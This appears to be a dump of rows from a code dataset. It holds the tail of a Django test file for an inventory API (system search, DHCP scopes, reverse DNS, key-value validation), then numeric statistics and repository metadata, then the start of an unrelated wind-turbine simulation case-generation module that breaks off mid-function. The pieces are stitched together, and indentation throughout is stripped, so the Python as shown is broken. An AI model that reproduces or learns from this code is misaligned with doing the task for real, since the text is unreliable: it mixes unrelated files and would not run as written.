self.assertEqual(json.loads(resp.content)['truth:test:cluster_owner'], 'The Cluster Owner')
resp = self.client.get('/api/v2/keyvalue/?value=10.99.32.3', follow=True)
self.assertEqual(json.loads(resp.content)['host:fake-hostname1:nic.0.ipv4_address.0'], '10.99.32.3')
def test_search_by_asset_tag(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'asset_tag':'65432'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['asset_tag'], '65432')
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname2')
def test_search_by_serial(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'serial':'39993'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['serial'], '39993')
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_serial_and_asset_tag_not_found(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'serial':'39993', 'asset_tag':'99999asdf'}, follow=True)
self.assertEqual(resp.status_code, 404)
def test_search_by_system_rack(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_system_rack_and_rack_order(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1', 'rack_order':'1.00'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_system_rack_and_rack_order_not_found(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1', 'rack_order':'2.00'}, follow=True)
self.assertEqual(resp.status_code, 404)
def test_search_by_system_rack_and_serial(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1', 'serial':'39993'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_system_switch_ports(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'switch_ports':'101.02'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_system_switch_ports_not_found(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'switch_ports':'shouldnteverhavethisasaswitchport101.02'}, follow=True)
self.assertEqual(resp.status_code, 404)
def test_search_by_system_rack_and_serial_not_found(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1', 'serial':'39993asdf'}, follow=True)
self.assertEqual(resp.status_code, 404)
class DHCPApi(TestCase):
fixtures = ['testdata.json']
def setUp(self):
self.client = Client()
def test_get_single_scope(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=dhcp_scopes', follow=True)
scope_list = json.loads(resp.content)
self.assertEqual(scope_list[0]['dhcp.is_scope'], 'True')
self.assertEqual(scope_list[0]['dhcp.scope.start'], '10.0.1.0')
self.assertEqual(scope_list[0]['dhcp.scope.end'], '10.0.1.255')
self.assertEqual(scope_list[0]['dhcp.scope.name'], 'phx-vlan73')
def test_get_second_scope(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=dhcp_scopes', follow=True)
scope_list = json.loads(resp.content)
"""self.assertEqual(scope_list[1]['dhcp.is_scope'], 'True')
self.assertEqual(scope_list[1]['dhcp.scope.start'], '10.0.0.0')
self.assertEqual(scope_list[1]['dhcp.scope.end'], '10.0.0.255')
self.assertEqual(scope_list[1]['dhcp.scope.name'], 'phx-vlan81')"""
def test_get_multiple_scopes(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=dhcp_scopes', follow=True)
scope_list = json.loads(resp.content)
"""self.assertEqual(scope_list[0]['dhcp.is_scope'], 'True')
self.assertEqual(scope_list[0]['dhcp.scope.start'], '10.0.1.0')
self.assertEqual(scope_list[0]['dhcp.scope.end'], '10.0.1.255')
self.assertEqual(scope_list[0]['dhcp.scope.name'], 'phx-vlan73')
self.assertEqual(scope_list[1]['dhcp.is_scope'], 'True')
self.assertEqual(scope_list[1]['dhcp.scope.start'], '10.0.0.0')
self.assertEqual(scope_list[1]['dhcp.scope.end'], '10.0.0.255')
self.assertEqual(scope_list[1]['dhcp.scope.name'], 'phx-vlan81')"""
def test_get_system_by_scope(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=system_by_scope&scope=phx-vlan73', follow=True)
system_list = json.loads(resp.content)
self.assertEqual(system_list[0]['nic.0.mac_address.0'],'00:00:00:00:00:AA')
self.assertEqual(system_list[0]['nic.0.ipv4_address.0'],'10.99.32.1')
self.assertEqual(system_list[0]['nic.1.mac_address.0'],'00:00:00:00:00:BB')
self.assertEqual(system_list[0]['nic.1.ipv4_address.0'],'10.99.32.2')
def test_get_adapters_by_system(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=adapters_by_system&system=fake-hostname2', follow=True)
system_list = json.loads(resp.content)
#print system_list
def test_delete_network_adapter(self):
resp = self.client.delete('/en-US/api/v2/keyvalue/1/', {'system_hostname':'fake-hostname2', 'adapter_number':'0', 'key_type':'delete_network_adapter'})
#print "The content is %s" % resp.content
class TestReverseDNSApi(TestCase):
fixtures = ['testdata.json']
def setUp(self):
self.client = Client()
def test_get_single_reverse_zone_names_with_descriptions(self):
resp = self.client.get('/api/v2/reverse_dns/1/get_reverse_dns_zones_with_names/', follow=True)
self.assertEqual(resp.status_code, 200)
scope_list = json.loads(resp.content)
self.assertEqual(len(scope_list), 2)
self.assertEqual(scope_list[0]['name'], 'phx1-32.8.10.in-addr.arpa')
self.assertEqual(scope_list[0]['description'], '10.99.32.0 reverse dns zone')
self.assertEqual(scope_list[1]['name'], 'phx1-33.8.10.in-addr.arpa')
self.assertEqual(scope_list[1]['description'], '10.99.33.0 reverse dns zone')
def test_get_system_by_reverse_dns_zone(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=system_by_reverse_dns_zone&zone=phx1-32.8.10.in-addr.arpa', follow=True)
self.assertEqual(resp.status_code, 200)
system_list = json.loads(resp.content)
self.assertEqual(len(system_list), 2)
self.assertEqual(system_list[0]['nic.0.ipv4_address.0'],'10.99.32.1')
self.assertEqual(system_list[0]['hostname'],'fake-hostname2')
self.assertEqual(system_list[0]['nic.1.ipv4_address.0'],'10.99.32.2')
self.assertEqual(system_list[1]['nic.0.ipv4_address.0'],'10.99.32.3')
self.assertEqual(system_list[1]['hostname'],'fake-hostname1')
class KeyValueApi(TestCase):
fixtures = ['testdata.json']
def setUp(self):
self.client = Client()
def test_get_adapters_by_system(self):
resp = self.client.get('/api/v2/keyvalue/3/', {'key_type':'adapters_by_system','system':'fake-hostname2'}, follow=True)
#print resp.content
def test_keyvalue_set_invalid_ip(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'nic.0.ipv4_address.0'})
self.assertEqual(resp.status_code, 401)
def test_keyvalue_set_valid_ip(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'1', 'value':'10.99.32.1','key':'nic.0.ipv4_address.0'})
self.assertEqual(resp.status_code, 200)
def test_keyvalue_set_invalid_mac_address(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'asdfsadfsadf','key':'nic.0.mac_address.0'})
self.assertEqual(resp.status_code, 401)
def test_keyvalue_set_valid_mac_address(self):
resp = self.client.put('/en-US/api/v2/keyvalue/2/', {'system_id':'1', 'value':'00:00:00:00:00:00','key':'nic.0.mac_address.0'})
self.assertEqual(resp.status_code, 200)
def test_keyvalue_set_invalid_is_dhcp_scope(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'true','key':'is_dhcp_scope'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_is_dhcp_scope(self):
resp = self.client.put('/en-US/api/v2/keyvalue/1/', {'system_id':'1', 'value':'True','key':'is_dhcp_scope'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_scope_start(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.scope.start'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_scope_start(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'1', 'value':'10.99.32.1','key':'dhcp.scope.start'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_scope_end(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.scope.end'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_scope_end(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'10.99.32.1','key':'dhcp.scope.end'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_pool_start(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.pool.start'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_pool_start(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'10.99.32.1','key':'dhcp.pool.start'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_pool_end(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.pool.end'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_pool_end(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'10.99.32.1','key':'dhcp.pool.end'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_scope_netmask(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.scope.start'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_scope_netmask(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'1', 'value':'10.99.32.1','key':'dhcp.scope.start'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_ntp_server(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.option.ntp_server.0'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_ntp_server(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'10.99.32.1','key':'dhcp.option.ntp_server.0'})
self.assertEqual(resp.status_code, 200)"""
| 52.131673
| 159
| 0.672879
| 2,160
| 14,649
| 4.376852
| 0.077315
| 0.128517
| 0.068119
| 0.078062
| 0.851597
| 0.825365
| 0.813941
| 0.796806
| 0.741062
| 0.717157
| 0
| 0.053129
| 0.148133
| 14,649
| 280
| 160
| 52.317857
| 0.704464
| 0.00983
| 0
| 0.44086
| 0
| 0.005376
| 0.274401
| 0.106808
| 0
| 0
| 0
| 0.003571
| 0.333333
| 1
| 0.225806
| false
| 0
| 0.064516
| 0
| 0.354839
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cab756e2a615ac5ebe0c81a930e636334d09b2e
| 34,924
|
py
|
Python
|
wisdem/aeroelasticse/CaseLibrary.py
|
ptrbortolotti/WISDEM
|
2b7e44716d022e2f62140073dd078c5deeb8bf0a
|
[
"Apache-2.0"
] | 1
|
2020-06-02T14:58:28.000Z
|
2020-06-02T14:58:28.000Z
|
wisdem/aeroelasticse/CaseLibrary.py
|
ptrbortolotti/WISDEM
|
2b7e44716d022e2f62140073dd078c5deeb8bf0a
|
[
"Apache-2.0"
] | 17
|
2019-09-13T22:21:15.000Z
|
2019-10-25T20:04:26.000Z
|
wisdem/aeroelasticse/CaseLibrary.py
|
ptrbortolotti/WISDEM
|
2b7e44716d022e2f62140073dd078c5deeb8bf0a
|
[
"Apache-2.0"
] | null | null | null |
import os
import numpy as np
from wisdem.aeroelasticse.CaseGen_General import CaseGen_General
from wisdem.aeroelasticse.CaseGen_IEC import CaseGen_IEC
# def power_curve_fit(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe='', ptfm_U_init=[], ptfm_pitch_init=[], ptfm_surge_init=[], ptfm_heave_init=[], metocean_U_init=[], metocean_Hs_init=[], metocean_Tp_init=[]):
# # Default Runtime
# T = 240.
# TStart = 120.
# # T = 120.
# # TStart = 60.
# # Overwrite for testing
# if TMax < T:
# T = TMax
# TStart = 0.
# # Run conditions for points which will be used for a cubic polynomial fit
# # U = [10.]
# U = [4.,8.,9.,10.]
# omega = np.interp(U, U_init, Omega_init)
# pitch = np.interp(U, U_init, pitch_init)
# # Check if floating
# floating_dof = [fst_vt['ElastoDyn']['PtfmSgDOF'], fst_vt['ElastoDyn']['PtfmSwDOF'], fst_vt['ElastoDyn']['PtfmHvDOF'], fst_vt['ElastoDyn']['PtfmRDOF'], fst_vt['ElastoDyn']['PtfmPDOF'], fst_vt['ElastoDyn']['PtfmYDOF']]
# if any(floating_dof):
# floating = True
# if ptfm_U_init == []:
# ptfm_U_init = [4., 5., 6., 7., 8., 9., 10., 10.5, 11., 12., 14., 19., 24.]
# ptfm_surge_init = [3.8758245863838807, 5.57895688031965, 7.619719770801395, 9.974666446553552, 12.675469235464321, 16.173740623041965, 20.069526574594757, 22.141906121375552, 23.835466098954708, 22.976075549477354, 17.742743260748373, 14.464576583154068, 14.430969814391759]
# ptfm_heave_init = [0.030777174904620515, 0.008329930604820483, -0.022973502300090893, -0.06506947653943342, -0.12101317451310406, -0.20589689839069836, -0.3169518280533253, -0.3831692055885472, -0.4409624802614755, -0.41411738171337675, -0.2375323506471747, -0.1156867221814119, -0.07029955933167854]
# ptfm_pitch_init = [0.7519976895165884, 1.104483050851386, 1.5180416334025146, 1.9864587671004394, 2.5152769741130134, 3.1937704945765795, 3.951314212429935, 4.357929703098016, 4.693765745171944, 4.568760630312074, 3.495057478277534, 2.779958240049992, 2.69008798174216]
# if metocean_U_init == []:
# metocean_U_init = [4.00, 6.00, 8.00, 10.00, 12.00, 14.00, 16.00, 18.00, 20.00, 22.00, 24.00]
# metocean_Hs_init = [1.908567568, 1.960162595, 2.062722244, 2.224539415, 2.489931091, 2.802984019, 3.182301485, 3.652236101, 4.182596165, 4.695439504, 5.422289377]
# metocean_Tp_init = [12.23645701, 12.14497777, 11.90254947, 11.5196666, 11.05403739, 10.65483551, 10.27562225, 10.13693777, 10.27842325, 10.11660396, 10.96177917]
# ptfm_heave = np.interp(U, ptfm_U_init, ptfm_heave_init)
# ptfm_surge = np.interp(U, ptfm_U_init, ptfm_surge_init)
# ptfm_pitch = np.interp(U, ptfm_U_init, ptfm_pitch_init)
# metocean_Hs = np.interp(U, metocean_U_init, metocean_Hs_init)
# metocean_Tp = np.interp(U, metocean_U_init, metocean_Tp_init)
# else:
# floating = False
# case_inputs = {}
# # simulation settings
# # case_inputs[("ElastoDyn","PtfmSgDOF")] = {'vals':['False'], 'group':0}
# # case_inputs[("ElastoDyn","PtfmHvDOF")] = {'vals':['False'], 'group':0}
# # case_inputs[("ElastoDyn","PtfmPDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmSwDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmRDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmYDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
# case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
# case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
# case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
# case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
# case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
# case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
# case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
# case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
# case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
# case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
# case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
# case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
# case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
# case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
# # initial conditions
# case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
# case_inputs[("InflowWind","HWindSpeed")] = {'vals':U, 'group':1}
# case_inputs[("ElastoDyn","RotSpeed")] = {'vals':omega, 'group':1}
# case_inputs[("ElastoDyn","BlPitch1")] = {'vals':pitch, 'group':1}
# case_inputs[("ElastoDyn","BlPitch2")] = case_inputs[("ElastoDyn","BlPitch1")]
# case_inputs[("ElastoDyn","BlPitch3")] = case_inputs[("ElastoDyn","BlPitch1")]
# if floating == True:
# case_inputs[("ElastoDyn","PtfmSurge")] = {'vals':ptfm_surge, 'group':1}
# case_inputs[("ElastoDyn","PtfmHeave")] = {'vals':ptfm_heave, 'group':1}
# case_inputs[("ElastoDyn","PtfmPitch")] = {'vals':ptfm_pitch, 'group':1}
# case_inputs[("HydroDyn","WaveHs")] = {'vals':metocean_Hs, 'group':1}
# case_inputs[("HydroDyn","WaveTp")] = {'vals':metocean_Tp, 'group':1}
# case_inputs[("HydroDyn","RdtnDT")] = {'vals':[fst_vt["Fst"]["DT"]], 'group':0}
# case_inputs[("HydroDyn","WaveMod")] = {'vals':[1], 'group':0}
# from CaseGen_General import CaseGen_General
# case_list, case_name_list = CaseGen_General(case_inputs, dir_matrix=runDir, namebase=namebase)
# channels = ['Wind1VelX','GenPwr']
# return case_list, case_name_list, channels
def power_curve(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe='', ptfm_U_init=[], ptfm_pitch_init=[], ptfm_surge_init=[], ptfm_heave_init=[], metocean_U_init=[], metocean_Hs_init=[], metocean_Tp_init=[], V_R25=0.):
# Default Runtime
T = 360.
TStart = 120.
# T = 120.
# TStart = 60.
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
# Run conditions
U_all = list(sorted([4., 6., 8., 9., 10., 10.5, 11., 11.5, 11.75, 12., 12.5, 13., 14., 19., 25., Vrated]))
if V_R25 != 0.:
U_all.append(V_R25)
U_all = list(sorted(U_all))
U = [Vi for Vi in U_all if Vi <= Vrated]
# print(U)
# dt = [0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001]
dt = [0.01]*len(U)
# U = [4.,8.,9.,10.]
omega = np.interp(U, U_init, Omega_init)
pitch = np.interp(U, U_init, pitch_init)
for i, (omegai, pitchi) in enumerate(zip(omega, pitch)):
if pitchi > 0. and omegai < Omega_init[-1]:
pitch[i] = 0.
# Check if floating
floating_dof = [fst_vt['ElastoDyn']['PtfmSgDOF'], fst_vt['ElastoDyn']['PtfmSwDOF'], fst_vt['ElastoDyn']['PtfmHvDOF'], fst_vt['ElastoDyn']['PtfmRDOF'], fst_vt['ElastoDyn']['PtfmPDOF'], fst_vt['ElastoDyn']['PtfmYDOF']]
if any(floating_dof):
floating = True
if ptfm_U_init == []:
ptfm_U_init = [3., 5., 6., 7., 8., 9., 10., 10.5, 11., 12., 14., 19., 25.]
ptfm_surge_init = [3.8758245863838807, 5.57895688031965, 7.619719770801395, 9.974666446553552, 12.675469235464321, 16.173740623041965, 20.069526574594757, 22.141906121375552, 23.835466098954708, 22.976075549477354, 17.742743260748373, 14.464576583154068, 14.430969814391759]
ptfm_heave_init = [0.030777174904620515, 0.008329930604820483, -0.022973502300090893, -0.06506947653943342, -0.12101317451310406, -0.20589689839069836, -0.3169518280533253, -0.3831692055885472, -0.4409624802614755, -0.41411738171337675, -0.2375323506471747, -0.1156867221814119, -0.07029955933167854]
ptfm_pitch_init = [0.7519976895165884, 1.104483050851386, 1.5180416334025146, 1.9864587671004394, 2.5152769741130134, 3.1937704945765795, 3.951314212429935, 4.357929703098016, 4.693765745171944, 4.568760630312074, 3.495057478277534, 2.779958240049992, 2.69008798174216]
if metocean_U_init == []:
metocean_U_init = [3.00, 6.00, 8.00, 10.00, 12.00, 14.00, 16.00, 18.00, 20.00, 22.00, 25.00]
metocean_Hs_init = [1.908567568, 1.960162595, 2.062722244, 2.224539415, 2.489931091, 2.802984019, 3.182301485, 3.652236101, 4.182596165, 4.695439504, 5.422289377]
metocean_Tp_init = [12.23645701, 12.14497777, 11.90254947, 11.5196666, 11.05403739, 10.65483551, 10.27562225, 10.13693777, 10.27842325, 10.11660396, 10.96177917]
ptfm_heave = np.interp(U, ptfm_U_init, ptfm_heave_init)
ptfm_surge = np.interp(U, ptfm_U_init, ptfm_surge_init)
ptfm_pitch = np.interp(U, ptfm_U_init, ptfm_pitch_init)
metocean_Hs = np.interp(U, metocean_U_init, metocean_Hs_init)
metocean_Tp = np.interp(U, metocean_U_init, metocean_Tp_init)
else:
floating = False
case_inputs = {}
# simulation settings
# case_inputs[("ElastoDyn","PtfmSgDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmHvDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmPDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","PtfmSwDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","PtfmRDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","PtfmYDOF")] = {'vals':['False'], 'group':0}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","DT")] = {'vals':dt, 'group':1}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
# initial conditions
case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
case_inputs[("InflowWind","HWindSpeed")] = {'vals':U, 'group':1}
case_inputs[("ElastoDyn","RotSpeed")] = {'vals':omega, 'group':1}
case_inputs[("ElastoDyn","BlPitch1")] = {'vals':pitch, 'group':1}
case_inputs[("ElastoDyn","BlPitch2")] = case_inputs[("ElastoDyn","BlPitch1")]
case_inputs[("ElastoDyn","BlPitch3")] = case_inputs[("ElastoDyn","BlPitch1")]
if floating:
case_inputs[("ElastoDyn","PtfmSurge")] = {'vals':ptfm_surge, 'group':1}
case_inputs[("ElastoDyn","PtfmHeave")] = {'vals':ptfm_heave, 'group':1}
case_inputs[("ElastoDyn","PtfmPitch")] = {'vals':ptfm_pitch, 'group':1}
case_inputs[("HydroDyn","WaveHs")] = {'vals':metocean_Hs, 'group':1}
case_inputs[("HydroDyn","WaveTp")] = {'vals':metocean_Tp, 'group':1}
case_inputs[("HydroDyn","RdtnDT")] = {'vals':dt, 'group':1}
case_inputs[("HydroDyn","WaveMod")] = {'vals':[1], 'group':0}
from wisdem.aeroelasticse.CaseGen_General import CaseGen_General
case_list, case_name_list = CaseGen_General(case_inputs, dir_matrix=runDir, namebase=namebase)
channels = ['Wind1VelX','GenPwr',"RtAeroCp", "RotTorq", "RotThrust", "RotSpeed", "BldPitch1"]
return case_list, case_name_list, channels
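# --- Hedged illustration (not part of CaseLibrary.py) ---
# The case_inputs convention assumed above: group 0 entries stay constant
# across every case, while entries sharing group 1 are varied element-wise,
# so all group-1 value lists must have the same length.
demo_inputs = {
    ("Fst", "TMax"): {'vals': [360.], 'group': 0},               # constant
    ("InflowWind", "HWindSpeed"): {'vals': [4., 8., 12.], 'group': 1},
    ("ElastoDyn", "RotSpeed"): {'vals': [5., 9., 12.], 'group': 1},
}
# CaseGen_General(demo_inputs, dir_matrix=runDir, namebase='demo') would then
# emit three cases, pairing (HWindSpeed, RotSpeed) index by index.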
def RotorSE_rated(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe='', ptfm_U_init=[], ptfm_pitch_init=[], ptfm_surge_init=[], ptfm_heave_init=[], metocean_U_init=[], metocean_Hs_init=[], metocean_Tp_init=[]):
# Default Runtime
T = 240.
TStart = 120.
# dt = 0.001
dt = 0.01
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
omega = np.interp(Vrated, U_init, Omega_init)
pitch = np.interp(Vrated, U_init, pitch_init)
# Check if floating
floating_dof = [fst_vt['ElastoDyn']['PtfmSgDOF'], fst_vt['ElastoDyn']['PtfmSwDOF'], fst_vt['ElastoDyn']['PtfmHvDOF'], fst_vt['ElastoDyn']['PtfmRDOF'], fst_vt['ElastoDyn']['PtfmPDOF'], fst_vt['ElastoDyn']['PtfmYDOF']]
if any(floating_dof):
floating = True
if ptfm_U_init == []:
ptfm_U_init = [4., 5., 6., 7., 8., 9., 10., 10.5, 11., 12., 14., 19., 24.]
ptfm_surge_init = [3.8758245863838807, 5.57895688031965, 7.619719770801395, 9.974666446553552, 12.675469235464321, 16.173740623041965, 20.069526574594757, 22.141906121375552, 23.835466098954708, 22.976075549477354, 17.742743260748373, 14.464576583154068, 14.430969814391759]
ptfm_heave_init = [0.030777174904620515, 0.008329930604820483, -0.022973502300090893, -0.06506947653943342, -0.12101317451310406, -0.20589689839069836, -0.3169518280533253, -0.3831692055885472, -0.4409624802614755, -0.41411738171337675, -0.2375323506471747, -0.1156867221814119, -0.07029955933167854]
ptfm_pitch_init = [0.7519976895165884, 1.104483050851386, 1.5180416334025146, 1.9864587671004394, 2.5152769741130134, 3.1937704945765795, 3.951314212429935, 4.357929703098016, 4.693765745171944, 4.568760630312074, 3.495057478277534, 2.779958240049992, 2.69008798174216]
